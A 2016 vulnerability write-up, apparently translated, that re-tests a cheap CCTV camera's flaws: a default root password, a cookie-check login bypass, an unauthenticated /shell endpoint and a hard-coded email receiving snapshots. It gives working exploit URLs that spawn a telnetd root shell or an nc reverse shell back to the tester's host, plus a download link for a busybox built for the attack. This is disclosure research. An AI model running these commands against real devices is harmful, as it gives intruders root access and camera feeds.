Mickey · 2016/02/18 11:02

0x00 Vulnerability analysis


Today I read a foreign researcher's analysis of a cheap CCTV camera, at www.pentestpartners.com/blog/pwning… (the camera was bought from Amazon at www.amazon.co.uk/dp/B0162AQC…). It exposes four main vulnerabilities: a default password, a web login authentication bypass, a built-in webshell, and sending camera pictures to a hard-coded email address. I have tested the article myself; there are errors and incomplete spots, which I add to one by one below 🙂

1. Default password

The default WEB login name is admin and the password is empty.

In addition, after cracking the password hashes in passwd, the default root password turns out to be "juantech". Logging in over Telnet with it gives a command shell directly, as shown in Figure 1:

2. WEB authentication bypass

When you first visit index.html you are asked for a username and password; after entering the correct ones you are taken to view2.html. If you open view2.html directly, you are redirected back to index.html and asked for account information again. Download the firmware and unpack it with Binwalk, as shown in Figure 2:

View view2.js and find the following:

```js
$(document).ready(function () {
    // The three values come straight from cookies the browser sends
    dvr_camcnt = Cookies.get("dvr_camcnt");
    dvr_usr = Cookies.get("dvr_usr");
    dvr_pwd = Cookies.get("dvr_pwd");
    // Only their presence is checked, never their correctness
    if (dvr_camcnt == null || dvr_usr == null || dvr_pwd == null) {
        location.href = "/index.html";
    }
});
```

As you can see, the page only jumps to index.html when dvr_camcnt, dvr_usr or dvr_pwd is null, so all we need is to set dvr_camcnt, dvr_usr and dvr_pwd to any non-null values. From the view2.js source you can also see that dvr_camcnt actually controls the number of channels, as follows:

```js
function goto_open_all() {
    if (dvr_viewer && dvr_viewer.ConnectRTMP) {
        // dvr_camcnt (taken from the cookie) selects how many players to show
        dvr_viewer.SetPlayerNum(dvr_camcnt);
        // switch(dvr_camcnt)
        // {
        //     case "4":
        //         dvr_viewer.flSetViewDiv(4);
        //         break;
        //     case "8":
        //         dvr_viewer.flSetViewDiv(9);
        //         break;
        //     case "16":
        //         dvr_viewer.flSetViewDiv(16);
        //         break;
        //     case "24":
        //         dvr_viewer.flSetViewDiv(25);
        //         break;
        // }
        open_all(dvr_camcnt);
    } else {
        // Viewer plugin not ready yet; retry in a second
        dvr_viewer = $("#viewer")[0];
        setTimeout(goto_open_all, 1000);
    }
}
```

dvr_camcnt is only supposed to take the values 2, 4, 8 and 24, but in the actual test other values work fine as well. The proof of bypassing login authentication is shown in Figure 3.

3. Built-in Webshell

Looking through the unpacked firmware directory, we found that dvr_app contains the web service. Running strings on the dvr_app binary shows the paths /moo, /whoami, /shell and /snapshot; trying to access them, we found that none of these functions requires any authentication, as shown in Figure 4.

Accessing /shell simply hangs. Load dvr_app into IDA and look at the handler for the shell function; since the firmware is little-endian ARM, you can read the pseudocode directly with IDA's F5. As shown in Figure 5.

There are two ways to use this. The first is to bind /bin/sh to an arbitrary port with telnetd and then connect to that port with Telnet; the login needs no authentication. This is a very common approach when you do not know the firmware's own Telnet account. The command is as follows:

```
http://target IP address/shell?/usr/sbin/telnetd -l/bin/sh -p 25
```

However, in real testing there are firewall/NAT issues to consider: many devices only have port 80 mapped, so although the port you opened is listening on the device, you cannot connect to it. As shown in Figure 6.

In that case you can use nc to bounce a shell back out. Probably because the firmware version differs, the busybox on the device I tested has its own nc, so I executed

```
http://target IP address/shell?/bin/busybox nc my IP address 53 -e /bin/sh
```

and got the bounced command shell, as shown in Figure 7.

Because of this, he statically compiled a busybox, downloaded it to a writable directory with wget, made it executable, and finally ran the nc command. He has provided the compiled busybox, which can be downloaded from http://212.111.43.161/busybox.

4. Send the camera picture to the hard-coded email address

Looking at the dvr_app binary with strings, we found another suspicious string:

```
.rodata:002260E0 0000005A C [email protected]&subject=Who are you?&content=%s&snapshot=yes&vin=0&size=320x180
```

Searching for [email protected] turns up https://github.com/simonjiuan/ipc/blob/master/src/cgi_misc.c, whose source shows:

```c
#define DEFAULT_USER_EMAIL "[email protected]"
#define DEFAULT_USER_PASSWORD "dvrhtml"
#define DEFAULT_SMTP_SERVER "mail.esee100.com"
#define DEAFULT_TARGE_EMAIL "[email protected]"
```

@hdmoore also mentioned this Chinese email address on Twitter, so I took a peek. Currently mail.esee100.com does not resolve, but the esee100.com CNAME resolves to www.dvrskype.com. Checking the domain registration of www.dvrskype.com gives [email protected], as shown in Figure 8. Note that the registrant organisation is "Guangzhou Jiuan Optoelectronic Technology Co., Ltd.", and the uploader of the GitHub repository is also a technical staff member of Jiuan Optoelectronic Technology Co., Ltd. As Figure 9 shows, at startup the device would send the /whoami output together with a CCTV camera snapshot to [email protected]. Of course, this SMTP server no longer exists; it may have been a test function left over from development at the time.

0x01 Global Statistics


Because the device runs a custom web server, its HTTP Server header carries the distinctive string "JAWS/1.0". SANS has recently been paying more attention to domestic vulnerability scanning (https://isc.sans.edu/forums/diary/Scanning+for+Fortinet+ssh+backdoor/20635/), so I just used Shodan results directly. As shown in Figure 10.

As you can see, about 42,545 of these cheap CCTV cameras worldwide are exposed to the Internet. The most common ports are 80/8080, and the countries with the most devices are Turkey, India and Vietnam. 🙂

At present there also appears to be automated malicious exploitation of these CCTV cameras: looking at several devices, I found that a number of them had the following in their process list

```
 1560 root       620 S    ./dropbear -p 15081 -r /tmp/dropbear/dropbear_rsa_ho
```

and had used wget to download malicious files from a remote host.

0x02 Vulnerability Prevention


At present there is no official firmware patch. You are advised not to expose management ports such as 80/23 to the Internet.

0x03 Thank the people


Thanks to the low-key Mr. Zhang for teaching me reverse engineering. Mr. Zhang has kindly and patiently answered my childish questions and has never grown tired of them.